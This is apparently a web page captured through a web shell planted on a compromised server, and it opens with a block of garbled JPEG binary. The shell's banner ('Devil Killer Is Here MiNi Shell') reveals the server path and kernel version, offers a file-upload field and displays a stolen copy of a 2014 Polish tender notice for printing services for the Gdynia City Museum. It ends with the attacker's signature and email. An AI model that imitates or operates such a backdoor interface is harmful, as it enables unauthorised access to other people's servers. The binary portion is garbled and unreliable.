JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140805/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140805/168867-N-2014.html

<p class="kh_header"><b>Gdynia: Usługi poligraficzne dla Muzeum Miasta Gdyni</b><br>
<b>Numer ogłoszenia: 168867 - 2014; data zamieszczenia: 05.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Miasta Gdyni , ul. Zawiszy Czarnego 1, 81-374 Gdynia, woj. pomorskie, tel. 58 6620910, faks 58 6620940.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.muzeumgdynia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi poligraficzne dla Muzeum Miasta Gdyni.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Zakres przedmiotu zamówienia: CPV: 79.81.00.00-5 usługi  drukowania, 79823000-9 - usługi drukowania i dostawy.
2.	Przedmiotem zamówienia są usługi poligraficzne polegające na wydrukowaniu dla potrzeb Muzeum Miasta Gdyni druków w postaci między innymi plakatów, zaproszeń, katalogów, informatorów, folderów, teczek wraz z pracami introligatorskimi oraz ich dostawą do siedziby zgodnie z wytycznymi Zamawiającego opisanych szczegółowo w ust. 3 poniżej, zwanych dalej łącznie Wydrukami.
3.	Wykonawca wykona i dostarczy:
1)	plakat o poniższych parametrach:
a)	format: B1,
b)	nakład:50. sztuk,  
c)	papier: kreda matowa ok.120 g/m2,
d)	kolory druku: 4+0 (CMYK),
e)	Zamawiający przedstawi Wykonawcy projekt i treść plakatu,
f)	termin druku: 5 dni robocze od dnia przekazania przez Zamawiającego materiałów do drukowania, nie później jednak niż do dnia 01.09.2014 rok;
2)	plakat o poniższych parametrach:
a)	format: A2,
b)	nakład: 550 sztuk, 
c)	papier: kreda matowa ok.120 g/m2,
d)	kolory druku: 4+0 (CMYK),
e)	Zamawiający przedstawi Wykonawcy projekt i treść plakatu,
f)	termin druku: 5 dni robocze od dnia przekazania przez Zamawiającego materiałów do drukowania, nie później jednak niż do dnia 01.09.2014 rok;
3)	zaproszenie o poniższych parametrach:
a)	format: A5,
b)	nakład: 500 sztuk,
c)	karton: dobrej jakości tektura szara,
d)	awers - tłoczenie + folia na gorąco (2 kolory),
e)	rewers - sitodruk lub offset 1 kolor CMYK,
f)	Zamawiający przedstawi Wykonawcy projekt i treść zaproszenia,
g)	termin druku: 5 dni robocze od dnia przekazania przez Zamawiającego materiałów do drukowania, nie później jednak niż do dnia 29.08.2014 rok;
4)	katalog o poniższych parametrach:
a)	nakład: 1000 egzemplarzy,
b)	format: (w pionie) A4,
c)	objętość każdej wersji: 160 stron,
d)	oprawa twarda: przód i tył dobrej jakości tektura szara 3 mm mocowana do wyklejki, oprawa szyto-klejona; Wkład szyty nicią w kolorze czerwonym; grzbiet i szycia należy wykonać starannie - grzbiet będzie odsłonięty,
e)	na 1 stronie okładki folia na gorąco (2 kolory) + tłoczenie (cała strona),
f)	na 4 stronie okładki folia na gorąco (1 kolor) + tłoczenie (cała strona),
g)	wyklejka: druk 1+1 Pantone, Sora Matt Plus 150 g lub papier offsetowy 180 g,
h)	Wkład: druk 4+4 CMYK, Sora Matt Plus 135 g,
i)	numer ISBN,
j)	Zamawiający przedstawi Wykonawcy projekt i treść katalogów,
k)	termin druku: 10 dni roboczych od dnia przekazania przez Zamawiającego materiałów do drukowania,
l)	przewidywany termin realizacji zamówienia: do 08.09.2014 rok;
5)	informator DL, o poniższych parametrach:
a)	druk: karton pocztówkowy matowy 300g,
b)	ilość: 2500 egzemplarzy,
c)	kolory druku: 4+4 (CMYK),
d)	Zamawiający przedstawi Wykonawcy projekt i treść druku,
e)	termin druku: 10 dni robocze od dnia przekazania przez Zamawiającego materiałów do drukowania,
f)	przewidywany termin realizacji zamówienia: do 03.09.2014 roku;
6)	teczka, o poniższych parametrach:
a)	format: A4,
b)	wykrojnik do wyboru z wykrojników posiadanych przez drukarnię (klasyczny, ze skrzydełkami w kształcie trapezów),
c)	karton opakowaniowy z jednej strony szary z drugiej biały (strona szara będzie stroną zewnętrzną) - np. typu Duoplex - ok. 320 g,
d)	druk: strona zewnętrzna (szara) folia na gorąco - 2 kolory,
e)	strona wewnętrzna (biała) - 1 kolor Pantone,
f)	gumka cienka, czerwona,
g)	ilość: 100 egzemplarzy,
h)	Zamawiający przedstawi Wykonawcy projekt i treść druku,
i)	termin druku: 5 dni robocze od dnia przekazania przez Zamawiającego materiałów do drukowania,
j)	przewidywany termin realizacji zamówienia: do 01.09.2014roku.
7)	tabliczka, o poniższych parametrach: 
a)	wydruk cyfrowy, wykonany bezpośrednio na PCV o grubości 5 mm,
b)	wydruki o wysokiej rozdzielczości i małym ziarnie,
c)	wymiary w przedziale: 200x300mm, 300x600mm, 200x2400mm itp.,
d)	ilość:  27 m2 (łączna powierzchnia tabliczek),
e)	Zamawiający przedstawi Wykonawcy projekt i treść druku,
f)	termin druku: 5 dni robocze od dnia przekazania przez Zamawiającego materiałów do drukowania,
g)	przewidywany termin realizacji zamówienia: do 01.09.2014roku.
8)	wydruk cyfrowy, o poniższych parametrach:
a)	kolor:  czarno-biały wykonany na papierze samoprzylepnym matowym, 
b)	gramatura: ok. 110-120 g, 
c)	wydruki  przyklejone do białej tektury o grubości 2 mm, 
d)	format: 100x200 mm,
e)	ilość: 200 sztuk,
f)	Zamawiający przedstawi Wykonawcy projekt i treść druku,
g)	termin druku: 5 dni robocze od dnia przekazania przez Zamawiającego materiałów do drukowania,
9)	folder edukacyjny, o poniższych parametrach:
a)	format: 560x420 mm, składany do 280x140mm, 
b)	druk offsetowy na papierze offsetowym ok. 120-140 g,
c)	kolory druku: 4+4 (CMYK),
d)	ilość: 3000 sztuk,
e)	Zamawiający przedstawi Wykonawcy projekt i treść druku,
f)	termin druku: 5 dni robocze od dnia przekazania przez Zamawiającego materiałów do drukowania
g)	przewidywany termin realizacji zamówienia: do 01.09.2014roku,
10)	folia samoprzylepna biała, która dostarczona  będzie w postaci wyciętych już liter/grafiki ploterem, o poniższych parametrach:
a)	format: m2,
b)	litery i grafika wycinane będą ploterem z folii samoprzylepnej białej,
c)	montaż za pomocą folii transportowej,
d)	ilość: 35 m2,
e)	Zamawiający przedstawi Wykonawcy projekt i treść druku,
f)	termin druku: 5 dni robocze od dnia przekazania przez Zamawiającego materiałów do drukowania
g)	przewidywany termin realizacji zamówienia: do 01.09.2014roku.
11)	folia samoprzylepna czarna, która dostarczona będzie w postaci wyciętych już liter/grafiki  ploterem, o poniższych parametrach:
a)	format:m2,
b)	litery i grafika będą wycinane ploterem z folii samoprzylepnej czarnej,
c)	montaż za pomocą folii transportowej,
d)	ilość: 35 m2,
e)	Zamawiający przedstawi Wykonawcy projekt i treść druku,
f)	termin druku: 5 dni robocze od dnia przekazania przez Zamawiającego materiałów do drukowania
g)	przewidywany termin realizacji zamówienia: do 01.09.2014roku.,
12)	folia samoprzylepna kolorowa, która dostarczona będzie w postaci wyciętych już liter/grafiki  ploterem, o poniższych parametrach:
a)	forma: m2,
b)	litery i grafika wycinane będą ploterem z folii samoprzylepnej w różnych kolorach lub zadrukowanej wcześniej kolorem,
c)	montaż za pomocą folii transportowej,
d)	ilość: 8 m2,
e)	Zamawiający przedstawi Wykonawcy projekt i treść druku,
f)	termin druku: 5 dni robocze od dnia przekazania przez Zamawiającego materiałów do drukowania,
g)	przewidywany termin realizacji zamówienia: do 01.09.2014roku.
4.	Pozostałe wymagania dotyczące realizacji przedmiotu zamówienia:
1)	przedmiot zamówienia realizowany będzie sukcesywnie, zgodnie z zapotrzebowaniem  Zamawiającego i na każdorazowe jego wezwanie, w terminach o których mowa w ust. 3,
2)	projekty Wydruków, o których mowa w ust 3 każdorazowo zostaną przesłane przez Zamawiającego w formie mailowej na adres Wykonawcy,
3)	Wykonawca na bazie każdorazowo przesłanych przez Zamawiającego projektów wydrukuje i dostarczy Wydruki,
4)	Wykonawca zobowiązany będzie do poczynania wszelkich uzgodnień z Zamawiającym na każdym etapie realizacji zamówienia,
5)	Wykonawca zobowiązany będzie przed wykonaniem druku całego nakładu danego zamówienia, na wezwanie Zamawiającego do wydrukowania i dostarczenie w terminie 2 dni od momentu przesłania mailem wezwania, próbnego wydruku Wydruków, o których mowa w ust. 3 w celu ich akceptacji przez Zamawiającego; 
6)	Wykonawca zobowiązany będzie do niezwłocznego uwzględniania i dokonywania stosownych korekt Wydruków zgłaszanych przez Zamawiającego,
7)	Wykonawca dostarczy Wydruki bezpośrednio do siedziby Zamawiającego, w dni robocze w godzinach urzędowania tj. pomiędzy 900 a 1500;
8)	Wykonawca zobowiązany będzie do zrealizowania przedmiotu zamówienia z zastosowaniem wysokiej jakości materiałów, zgodnie z obowiązująca wiedzą w tym zakresie, odpowiednimi normami technicznymi i zasadami techniki oraz ustaleniami z Zamawiającym,
9)	Wykonawca zobowiązany będzie do realizacji przedmiotu zamówienia na własny koszt, przy udziale własnych materiałów, środka transportu lub może zlecić dostawę innemu przewoźnikowi, 
10)	Wykonawca zobowiązany będzie należycie zabezpieczyć Wydruki na czas transportu, umieścić je w odpowiednim opakowaniu by nie dopuścić do uszkodzenia lub/i pogorszenia jakości Wydruków oraz ponosi całkowitą odpowiedzialność za dostawę Wydruków,
11)	Wykonawca zobowiązany będzie do umieszczenia na opakowaniu tytuł zamówienia oraz liczbę sztuk w opakowaniu,
12)	w przypadku stwierdzenia niezgodności ilościowych, pomyłek, uszkodzenia lub wad jakościowych otrzymanych Wydruków, Zamawiający postawi Wydruki do dyspozycji Wykonawcy, oraz niezwłocznie/zgłoszenie telefoniczne potwierdzone mailowo/ powiadomi Wykonawcę o stwierdzonych brakach i wadach w Wydrukach,
13)	Wykonawca będzie zobowiązany w terminie maksymalnie dwóch dni od wpłynięcia reklamacji dostarczyć zastępczą/brakującą partię Wydruków wolną od wad bezpośrednio do siedziby Zamawiającego, w godzinach jego urzędowania tj. pomiędzy 900 a 1500,
14)	za wykonanie danego przedmiotu zamówienia/danej partii Wydruków uznaje się sporządzenie protokołu odbioru poszczególnej partii Wydruków potwierdzającego należyte ich wykonanie przez osobę Zamawiającego wskazaną w załączniku nr 1 do umowy.
5.	Wykonawca zobowiązany jest udzielić rocznej gwarancji i rękojmi za wady na zaoferowany przedmiot zamówienia z zastrzeżeniem postanowień ust. 3 pkt. 4. Termin liczony jest osobno dla poszczególnych partii Wydruków, liczony od daty dostawy poszczególnych partii Wydruków.
6.	Zamawiający dopuszcza realizację zamówienia przez podwykonawców. Wykonawca zobowiązany jest wskazać w ofercie części zamówienia, których wykonanie zamierza powierzyć podwykonawcom. 
7.	Wykonawca zobowiązany jest wskazać w ofercie części zamówienia, których wykonanie zamierza powierzyć podwykonawcom, a w stosunku do podwykonawców na których zasoby Wykonawca powołuje się na zasadach określonych w art. 26 ust. 2b Ustawy, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 Ustawy Wykonawca zobowiązany jest podać również nazwę (firmę) podwykonawcy.
8.	Wykonawca ponosi pełną odpowiedzialność za prace wykonane przez podwykonawców również za usterki gwarancyjne..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość zamówień uzupełniających stanowiących nie więcej niż 50 % wartości zamówienia podstawowego. Zamówienia uzupełniające mogą dotyczyć całości przedmiotu zamówienia, w tym między innymi usługi drukowania nowych materiałów poligraficznych.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.81.00.00-5, 79.82.30.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawców wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu wykazania się spełnieniem warunku posiadania niezbędnej wiedzy i doświadczenia, Wykonawca musi wykazać się w całości należytym wykonaniem w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres działalności jest krótszy - w tym okresie, co najmniej trzech usług, o charakterze i złożoności porównywalnej do przedmiotu zamówienia, tj. każda polegająca na usłudze drukowania na kwotę nie mniejszą niż 20.000,00 zł brutto,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto Wykonawca zobowiązany jest załączyć do oferty sporządzonej na formularzu ofertowym (według wzoru stanowiącego załącznik nr 1 do SIWZ):
1)	pisemne zobowiązanie podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, w przypadku, o którym mowa w Rozdziale VIII ust. 4 SIWZ - w oryginale albo w postaci uwierzytelnionej notarialnie kopii; 
2)	dokumenty dotyczące w szczególności charakteru stosunku jaki będzie łączył Wykonawcę z innym podmiotem oraz zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia, w przypadku, o którym mowa w Rozdziale VIII ust. 4 SIWZ - w oryginale lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę; w przypadku, gdy powyższe  informacje zostaną zawarte w pisemnym zobowiązaniu, o którym mowa w pkt. 1, Wykonawca nie musi przedkładać przedmiotowych dokumentów
3)	dokumenty, nie będące dokumentami potwierdzającymi spełnienie warunków udziału w postępowaniu:
a)	pełnomocnictwo - jeżeli umocowanie do reprezentowania i składania oświadczeń woli w imieniu Wykonawcy nie wynika z innych dokumentów załączonych do oferty - w oryginale albo w postaci uwierzytelnionej notarialnie kopii,
b)	pełnomocnictwo lub inny dokument potwierdzający umocowanie pełnomocnika do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie zamówienia, o którym mowa w Rozdziale X ust. 2 pkt. 2 SIWZ - w oryginale albo w postaci uwierzytelnionej notarialnie kopii.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje, że wprowadzenie zmian do zawartej umowy możliwe będzie w sytuacjach, gdy Zamawiający uzna, że zmiany te są niezbędne celem zapewnienia prawidłowego wykonania umowy przez strony, w szczególności w następujących przypadkach:
1)	omyłek pisarskich lub błędów rachunkowych, 
2)	mających na celu wyjaśnienie wątpliwości treści umowy, jeśli będzie ona budziła wątpliwości interpretacyjne między stronami, 
3)	konieczności zmiany sposobu wykonania lub zakresu zamówienia z przyczyn wcześniej nie przewidzianych, 
4)	konieczności zmiany terminu wykonania zamówienia z przyczyn niezawinionych przez Wykonawcę, 
5)	jeżeli zmiany umowy, w tym zmiany sposobu płatności, wymagać będzie ochrona interesu Zamawiającego,
6)	zmiany cen brutto w związku ze zmianą obowiązujących stawek podatku od towarów i usług,
7)	zmiany albo rezygnacji z podwykonawcy z tym zastrzeżeniem, iż jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b Ustawy, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 Ustawy, przed zmianą umowy Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia wymagania w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia,
8)	innych zmian korzystnych dla Zamawiającego, chociażby wiązało się to z koniecznością zmiany terminu lub sposobu wykonania zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.muzeumgdynia.pl - podstrona zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Miasta Gdyni, 81-374 Gdynia, ul. Zawiszy Czarnego 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.08.2014 godzina 08:30, miejsce: Miejscem składania ofert jest siedziba Muzeum Miasta Gdyni, 81-374 Gdynia, ul. Zawiszy Czarnego 1 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com